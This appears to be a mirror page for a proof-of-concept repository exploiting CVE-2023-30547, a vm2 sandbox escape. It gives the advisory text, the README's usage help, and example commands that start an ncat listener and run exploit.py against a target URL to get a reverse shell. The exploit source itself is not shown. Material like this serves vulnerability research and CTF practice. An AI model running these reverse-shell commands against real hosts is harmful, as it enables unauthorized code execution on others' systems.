CVE-2023-30547 PoC — Sandbox Escape in vm2

Source

https://github.com/user0x1337/CVE-2023-30547

Associated Vulnerability

Title:Sandbox Escape in vm2 (CVE-2023-30547)
Description:vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.

Description

PoC to CVE-2023-30547 (Library vm2)

Readme

# CVE-2023-30547
This is a Proof-of-Concept to CVE-2023-30547 (https://nvd.nist.gov/vuln/detail/CVE-2023-30547). I created this PoC during a CTF.

## Usage
```bash
CVE-2023-30547 PoC [-h] [--url URL] [--lhost LHOST] [--lport LPORT]

PoC for the vm2 vulnerability CVE-2023-30547

options:
  -h, --help     show this help message and exit
  --url URL      Target URL
  --lhost LHOST  IP of the local host for a reverse shell
  --lport LPORT  Port of the local host for a reverse shell
```

## Example:
1. Terminal:
```bash
$ ncat -lnvp 1337
```
2. Terminal:
```bash
$ python3 exploit.py --url "http://vulnhost.local/run" --lhost 127.0.0.1 --lport 1337
```

File Snapshot


 [4.0K]  /data/pocs/289c3aa9ea3cad7f2e251f3e4e8fc3f87b60435d
├── [1.9K]  exploit.py
├── [ 18K]  LICENSE
└── [ 654]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!